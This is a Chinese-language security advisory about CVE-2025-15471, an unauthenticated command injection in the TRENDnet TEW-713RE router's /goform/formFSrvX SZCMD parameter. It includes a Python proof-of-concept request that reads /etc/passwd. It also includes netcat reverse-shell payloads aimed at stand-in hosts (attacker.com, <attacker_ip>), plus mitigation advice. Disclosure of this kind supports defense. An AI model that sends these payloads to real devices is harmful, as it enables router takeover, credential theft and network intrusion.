IPBUF安全漏洞报告
English
CVE-2025-15471 CVSS 9.8 严重

CVE-2025-15471 TRENDnet TEW-713RE路由器formFSrvX命令注入漏洞

披露日期: 2026-01-07

漏洞信息

漏洞编号
CVE-2025-15471
漏洞类型
OS命令注入
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
TRENDnet TEW-713RE (固件1.02), TEW-731RE (已停产)

相关标签

命令注入路由器漏洞TRENDnetTEW-713RECVE-2025-15471远程代码执行Web漏洞IoT安全网络设备无认证利用

漏洞概述

CVE-2025-15471是TRENDnet TEW-713RE路由器中发现的严重命令注入漏洞。该漏洞存在于路由器的Web管理界面文件/goform/formFSrvX中,攻击者可以通过SZCMD参数注入恶意OS命令。由于该漏洞CVSS评分高达9.8,属于严重级别,攻击者可以在无需任何认证的情况下远程执行任意系统命令,完全控制受影响设备。漏洞影响路由器的机密性、完整性和可用性,攻击者可窃取网络配置、植入后门或将其纳入僵尸网络。值得注意的是,该产品已于2020年10月23日停产,厂商不再提供安全更新,用户需自行采取防护措施。

技术细节

该漏洞为典型的OS命令注入(Command Injection)问题。漏洞位于TRENDnet TEW-713RE路由器固件1.02版本的Web服务器组件中,具体在/goform/formFSrvX端点。攻击者通过HTTP请求的SZCMD参数注入恶意命令,服务器端未对用户输入进行充分的命令边界检查和过滤,直接将参数值传递给系统shell执行。由于路由器通常以root权限运行Web服务,攻击者可在设备上获得完全控制权。常见利用方式包括:使用分号、管道符或反引号等命令连接符注入额外命令,如';cat /etc/passwd'或'|nc -e /bin/sh attacker.com 4444'。成功利用后可执行任意代码、安装持久化后门或横向移动至内网其他设备。

攻击链分析

STEP 1
1
攻击者发现目标路由器Web管理界面可访问(默认端口80)
STEP 2
2
构造包含恶意OS命令的HTTP请求,参数为SZCMD
STEP 3
3
服务器未过滤直接将用户输入拼接入system()或popen()调用
STEP 4
4
注入命令以路由器root权限执行,攻击者获得完全控制权
STEP 5
5
植入后门、窃取数据或将其作为跳板攻击内网其他设备

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target = 'http://<router_ip>/goform/formFSrvX' payload = ';cat /etc/passwd > /tmp/pwd.txt' params = {'SZCMD': payload} try: response = requests.get(target, params=params, timeout=10) print(f'Status: {response.status_code}') print(f'Response length: {len(response.text)}') except requests.exceptions.RequestException as e: print(f'Error: {e}') # Reverse shell payload example: # ';mkfifo /tmp/f;nc <attacker_ip> 4444 0</tmp/f|/bin/sh -i >/tmp/f 2>&1;rm /tmp/f'

影响范围

TRENDnet TEW-713RE 固件 <= 1.02
TRENDnet TEW-731RE 所有版本(已停产)

防御指南

临时缓解措施
由于该产品已停产且厂商不再提供安全更新,建议用户:1) 立即停止使用受影响的路由器;2) 将设备更换为仍在支持周期内的产品;3) 如暂时无法更换,应在防火墙层面阻断对路由器Web管理界面的外部访问,仅允许受信任的本地网络访问;4) 监控设备异常行为;5) 关注厂商官网是否有后续公告。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表